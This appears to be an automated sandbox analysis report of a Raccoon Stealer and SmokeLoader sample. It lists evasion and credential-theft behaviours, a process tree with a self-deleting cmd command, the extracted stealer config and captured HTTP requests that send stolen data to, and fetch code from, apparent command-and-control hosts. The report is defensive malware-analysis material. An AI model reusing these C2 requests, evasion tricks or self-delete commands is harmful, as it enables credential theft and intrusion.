Loading ...

Play interactive tourEdit tour

Analysis Report y98WYYcJ2U.exe

Overview

General Information

Sample Name:y98WYYcJ2U.exe
Analysis ID:56087
MD5:18b04e2fd804d553d9a35e088193dea7
SHA1:f3dfec27d03905211940da451e9ee1ed500abf33
SHA256:34dea8fb86e0f4d24ce31fb3d0b87d70feea93e48d3e74a3347001ad590f9b43

Most interesting Screenshot:

Detection

Raccoon SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Raccoon Stealer
Yara detected SmokeLoader
Allocates memory in foreign processes
Binary contains a suspicious time stamp
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Contains functionality to steal Internet Explorer form passwords
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Renames NTDLL to bypass HIPS
Tries to detect Sandboxie (via GetModuleHandle check)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64_hvm
  • y98WYYcJ2U.exe (PID: 5008 cmdline: 'C:\Users\user\Desktop\y98WYYcJ2U.exe' MD5: 18B04E2FD804D553D9A35E088193DEA7)
    • explorer.exe (PID: 2460 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
      • 3BD3.exe (PID: 4680 cmdline: C:\Users\user\AppData\Local\Temp\3BD3.exe MD5: 8576CCC1310EA39D4AC4B642C7700F91)
        • cmd.exe (PID: 4440 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\3BD3.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • timeout.exe (PID: 4856 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • 48F3.exe (PID: 1300 cmdline: C:\Users\user\AppData\Local\Temp\48F3.exe MD5: 1C886F74C9051CE8BE91FEC2083744F2)
        • msiexec.exe (PID: 2732 cmdline: msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cwfbibg (PID: 4600 cmdline: C:\Users\user\AppData\Roaming\cwfbibg MD5: 18B04E2FD804D553D9A35E088193DEA7)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"Config: ": ["00000000 -> [Raccoon Stealer] - v1.5.13-af-hotfix Release", "Build compiled on Mon Jul  6 14:33:03 2020", "Launched at: 2020.09.14 - 03:55:16 GMT", "Bot_ID: 717E1B34-6140-4FC8-B497-B7800CAA7E40_user", "Running on a desktop", "=R=A=C=C=O=O=N=", "- Cookies: 8", "- Passwords: 0", "- Files: 0", "System Information:", "- System Language: English", "- System TimeZone: -8 hrs", "- IP: 91.132.136.206", "- Location: 47.392502, 8.454600 | Zurich, Zurich, Switzerland (8010)", "- ComputerName: 528110", "- Username: user", "- Windows version: NT 10.0", "- Product name: Windows 10 Pro", "- System arch: x64", "- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)", "- RAM: 8191 MB (6822 MB used)", "- Screen resolution: 1280x1024", "- Display devices:", "0) Microsoft Basic Display Adapter", "============", "Installed Apps:", "Adobe Acrobat Reader DC (18.011.20055)", "Google Chrome (67.0.3396.99)", "Google Update Helper (1.3.33.17)", "Java 8 Update 171 (8.0.1710.11)", "Java Auto Updater (2.8.171.11)", "Mozilla Firefox 72.0.2 (x86 en-US) (72.0.2)", "============"]}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\LocalLow\machineinfo.txtJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
      C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dllConventionEngine_Keyword_InjectSearching for PE files with PDB path keywords, terms or anomalies.@stvemillertime
      • 0x17c37:$anchor: inject
      • 0x17c48:$anchor: inject
      • 0x1858a:$anchor: inject
      • 0x19ab8:$anchor: inject
      • 0x17bdc:$pcre: RSDS\x1A\x11\x81\x9AP)\x9AN\x9D\xCF\xA9p\x11yx\x99\x01z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb
      C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dllConventionEngine_Keyword_HookSearching for PE files with PDB path keywords, terms or anomalies.@stvemillertime
      • 0x1b30:$anchor: hook
      • 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
      C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dllConventionEngine_Keyword_ProxySearching for PE files with PDB path keywords, terms or anomalies.@stvemillertime
      • 0x1b3f:$anchor: Proxy
      • 0x1e8e:$anchor: Proxy
      • 0x1ee3:$anchor: Proxy
      • 0x2094:$anchor: Proxy
      • 0x20ac:$anchor: Proxy
      • 0x21de:$anchor: Proxy
      • 0x21f6:$anchor: Proxy
      • 0x220f:$anchor: Proxy
      • 0x295a:$anchor: Proxy
      • 0x2ba8:$anchor: Proxy
      • 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
      C:\Users\user\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dllConventionEngine_Keyword_HookSearching for PE files with PDB path keywords, terms or anomalies.@stvemillertime
      • 0x1b30:$anchor: hook
      • 0x1ad4:$pcre: RSDS\xA5\x85+s\x15\x1BsI\x8B_\x8A\x16\xA0\x81:$\x01z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb
      Click to see the 1 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1330007715.0000000000400000.00000040.00020000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
        00000000.00000003.1267461020.00000000001E0000.00000004.00000001.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
          00000003.00000002.1451110742.0000000000400000.00000040.00020000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
            00000003.00000003.1428267644.00000000001F0000.00000004.00000001.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
              00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                Click to see the 2 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.y98WYYcJ2U.exe.400000.0.raw.unpackJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
                  0.2.y98WYYcJ2U.exe.400000.0.unpackJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
                    0.3.y98WYYcJ2U.exe.1e0000.0.raw.unpackJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
                      3.2.cwfbibg.400000.0.raw.unpackJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
                        3.2.cwfbibg.400000.0.unpackJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
                          Click to see the 1 entries

                          Sigma Overview

                          No Sigma rule has matched

                          Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Found malware configurationShow sources
                          Source: machineinfo.txt.4.dr.binstrMalware Configuration Extractor: Raccoon Stealer {"Config: ": ["00000000 -> [Raccoon Stealer] - v1.5.13-af-hotfix Release", "Build compiled on Mon Jul 6 14:33:03 2020", "Launched at: 2020.09.14 - 03:55:16 GMT", "Bot_ID: 717E1B34-6140-4FC8-B497-B7800CAA7E40_user", "Running on a desktop", "=R=A=C=C=O=O=N=", "- Cookies: 8", "- Passwords: 0", "- Files: 0", "System Information:", "- System Language: English", "- System TimeZone: -8 hrs", "- IP: 91.132.136.206", "- Location: 47.392502, 8.454600 | Zurich, Zurich, Switzerland (8010)", "- ComputerName: 528110", "- Username: user", "- Windows version: NT 10.0", "- Product name: Windows 10 Pro", "- System arch: x64", "- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)", "- RAM: 8191 MB (6822 MB used)", "- Screen resolution: 1280x1024", "- Display devices:", "0) Microsoft Basic Display Adapter", "============", "Installed Apps:", "Adobe Acrobat Reader DC (18.011.20055)", "Google Chrome (67.0.3396.99)", "Google Update Helper (1.3.33.17)", "Java 8 Update 171 (8.0.1710.11)", "Java Auto Updater (2.8.171.11)", "Mozilla Firefox 72.0.2 (x86 en-US) (72.0.2)", "============"]}
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000004.00000003.1518715900.000000004B3BE000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.1528479530.000000000076C000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 3BD3.exe PID: 4680, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\LocalLow\machineinfo.txt, type: DROPPED
                          Machine Learning detection for sampleShow sources
                          Source: y98WYYcJ2U.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_0040A5D7 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,4_2_0040A5D7
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_00423030 CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,4_2_00423030
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_00423203 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,4_2_00423203
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_004094E8 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,4_2_004094E8
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_0040B586 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,4_2_0040B586
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_00409BD7 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,4_2_00409BD7
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_0041A0CC __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,4_2_0041A0CC
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_00408F24 __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,4_2_00408F24
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_00433A25 lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,4_2_00433A25
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_0043DD11 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,4_2_0043DD11
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_0045F48D FindFirstFileExW,4_2_0045F48D
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_0043DD31 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,4_2_0043DD31
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_0043DE7C GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,4_2_0043DE7C
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0267A650 GetVersionExW,FindFirstFileW,FindNextFileW,9_2_0267A650
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_00434B68 __EH_prolog,GetLogicalDriveStringsA,4_2_00434B68
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\moz-extension+++6cdaceb3-9468-4921-a80e-869192f558cd^userContextId=4294967295\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\idb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\moz-extension+++6cdaceb3-9468-4921-a80e-869192f558cd^userContextId=4294967295\idb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\lh46xpzs.default\storage\default\about+newtab\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movzx esi, word ptr [edi]5_2_004178C0
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then mov edi, dword ptr [ebp+14h]5_2_0040E8B0
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then push 60303581h5_2_004071B0
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movzx eax, word ptr [esi]5_2_0040D240
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movzx ebx, word ptr [edi]5_2_00414240
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movsx eax, byte ptr [edi]5_2_00409220
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then push 00000000h5_2_00402300
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movsx ebx, byte ptr [esi]5_2_00401300
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then add esi, 02h5_2_004033E0
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h5_2_00417460
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl5_2_00405540
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then push FFFFFFFFh5_2_00402500
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movzx eax, word ptr [ebx+edi*2]5_2_00406EA0
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then push ebp5_2_001E905F
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movzx eax, word ptr [ebx+edi*2]5_2_001D70F0
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movzx esi, word ptr [edi]5_2_001E7B10
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then mov edi, dword ptr [ebp+14h]5_2_001DEB00
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then push 60303581h5_2_001D7400
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movsx eax, byte ptr [edi]5_2_001D9470
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movsx eax, byte ptr [edi]5_2_001D9468
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movzx eax, word ptr [esi]5_2_001DD490
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movzx ebx, word ptr [edi]5_2_001E4490
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then movsx ebx, byte ptr [esi]5_2_001D1550
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then push 00000000h5_2_001D2550
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then add esi, 02h5_2_001D3630
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h5_2_001E76B0
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then push FFFFFFFFh5_2_001D2750
                          Source: C:\Users\user\AppData\Local\Temp\48F3.exeCode function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl5_2_001D5790
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, word ptr [esi]9_2_0266D240
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx ebx, word ptr [edi]9_2_02674240
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movsx eax, byte ptr [edi]9_2_02669220
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 00000000h9_2_02662300
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movsx ebx, byte ptr [esi]9_2_02661300
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h9_2_026633E0
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx esi, word ptr [edi]9_2_026778C0
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov edi, dword ptr [ebp+14h]9_2_0266E8B0
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 60303581h9_2_026671B0
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then movzx eax, word ptr [ebx+edi*2]9_2_02666EA0
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [eax+ecx*4], 00000000h9_2_02677460
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov byte ptr [ebp+edi-4Ch], bl9_2_02665540
                          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push FFFFFFFFh9_2_02662500

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 2018316 ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses 8.8.8.8:53 -> 192.168.2.3:60913
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 13 Sep 2020 18:55:06 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: closeLast-Modified: Mon, 18 Mar 2019 19:52:10 GMTETag: "5c8ff6ea-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 0
                          Source: global trafficHTTP traffic detected: POST /gate/log.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 155Host: chinadevmonster.top
                          Source: global trafficHTTP traffic detected: POST /file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c2192b8881e9e86fdae59338948668354bcd5e2d&callback=http://chinadevmonster.top/gate HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=4k683b59nd0j798043458nContent-Length: 2211Host: chinadevmonster.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: 2831ujedkdajsdj.info
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: 2831ujedkdajsdj.info
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: 2831ujedkdajsdj.info
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: 2831ujedkdajsdj.info
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://2831ujedkdajsdj.info/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: 2831ujedkdajsdj.info
                          Source: global trafficHTTP traffic detected: GET /gate/sqlite3.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: chinadevmonster.topConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /gate/libs.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: chinadevmonster.topConnection: Keep-Alive
                          Source: C:\Users\user\AppData\Local\Temp\3BD3.exeCode function: 4_2_004336F3 LoadLibraryA,FreeLibrary,LoadLibraryA,GetProcAddress,URLDownloadToFileA,4_2_004336F3
